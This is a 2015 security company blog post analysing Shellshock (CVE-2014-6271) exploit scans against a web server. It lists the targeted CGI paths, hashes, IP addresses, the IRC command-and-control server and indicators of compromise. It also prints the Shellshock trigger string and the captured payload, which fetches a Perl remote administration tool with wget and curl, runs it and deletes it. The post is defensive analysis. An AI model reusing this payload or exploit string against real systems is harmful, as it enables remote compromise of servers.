Analecta Cyber Company Blog: Shellshock Attempts in the Wild

2015-03-16

Shellshock Attempts in the Wild

Synopsis

From 2015-03-09T20:29:29 until 2015-03-09T20:29:51 automated scans originating from IP address 128.199.200.157.  Scans attempted to exploit the 2014 Shellshock vulnerability (CVE-2014-6271). If successful the commands from the attacker would download a malicious Remote Administrative Tool (RAT) and provide remote access to the system via an Internet Relay Chat (IRC) server hosted at IP address 216.70.100.172 (default IRC port, 6667). This report includes information about the exploit scan, payload, RAT hash values, source, command and control, and the damage assessment.



Exploit

The remote attacker attempted to access 28 popular Common Gateway Interface (CGI) scripts in an automated manner. The first request made by the attacker script is "GET HTTP/1.1 HTTP/1.1" - an invalid Hyper Text Trasfer Protocol (HTTP) request. The next 27 requests are as follows:

/cgi-bin/bash
/cgi-bin/contact.cgi
/cgi-bin/defaultwebpage.cgi
/cgi-bin/env.cgi
/cgi-bin/fire.cgi
/cgi-bin/forum.cgi
/cgi-bin/hello.cgi
/cgi-bin/index.cgi
/cgi-bin/main.cgi
/cgi-bin/meme.cgi
/cgi-bin/php
/cgi-bin/php4
/cgi-bin/php5
/cgi-bin/recent.cgi
/cgi-bin/sat-ir-web.pl
/cgi-bin-sdb/printenv
/cgi-bin/test-cgi
/cgi-bin/test.cgi
/cgi-bin/test-cgi.pl
/cgi-bin/test.sh
/cgi-bin/tools/tools.pl
/cgi-mod/index.cgi
/cgi-sys/defaultwebpage.cgi
/cgi-sys/entropysearch.cgi
/cgi-sys/php5
/phppath/cgi_wrapper
/phppath/php

The referrer then stars with the standard Shellshock exploit string:

() { :;};

Exploit Payload

The payload, when executed, downloads a malicious RAT to file path /tmp/b.pl using the wget or curl utility, executes the script with the local perl interpreter then deletes the original script file path. Once executed the RAT will continue running in memory, but the file on disk will no longer exist within the filesystem. This can make identification of the running script difficult.


system(\"
wget http://margaretguttshall.org/cata.txt -O /tmp/b.pl;
curl -O /tmp/b.pl http://margaretguttshall.org/cata.txt;
perl /tmp/b.pl;
rm -rf /tmp/b.pl*
\");
Formatted for readability

Remote Administration Tool (RAT)

The perl based remote administration tool was retrieved from the following URL (http has been replaced by hxxp):
hxxp://margaretguttshall.org/cata.txt

This file is 32,448 bytes in length.
MD5: 781b647de09953f1b20082840580dd59
SHA1: da9e2d09888a00fb2f6c50eeff45201fbd1efbfb
SHA256: b268b13f7d6405688d9285c0b14d1b59f9dcf90d8b1f2105c177650f61493345

Origin IP Address

128.199.200.157 resolves to h.pekanbaru.co


Command and Control IP Address

216.70.100.172 resolves to 5RHYTHMS.COM

When the RAT connects to the command and control IRC server in the #blackcat channel then randomly creates a nickname "x-" followed by any number between 1-1000. No interactions with compromised systems were identified during our analysis.


Indicators of Compromise and Remediation


  • Connections to or from IP addresses 128.199.200.157 or 216.70.100.172.
  • Connections over TCP port 6667 may indicate connection to an IRC chat room - common for some classes of remote command and control.
  • An active running process (perl) that is not typical for the system.


Damage Assessment

No damage was sustained by the server from these requests. If the attack had been successful the intruder would have the privileges of the running web server user. It's likely the attacker would create a secondary method of access and/or attempt to escalate to a more privileged user account.

Reference:

It is important to note that the registered owner of the IP addresses involved in this attack may be victims of a network incident. It is possible in many cases that the IP addresses identified from an incident are owned by one person or organization but are under the control of an unauthorized user.

Watch a quick video of a Shellshock exploit in action.

For assistance with log analysis or event mitigation, contact us: info@analecta-llc.com

CVE-2014-6271
Remote Administrative Tool (RAT)
Internet Relay Chat (IRC)
Common Gateway Interface (CGI)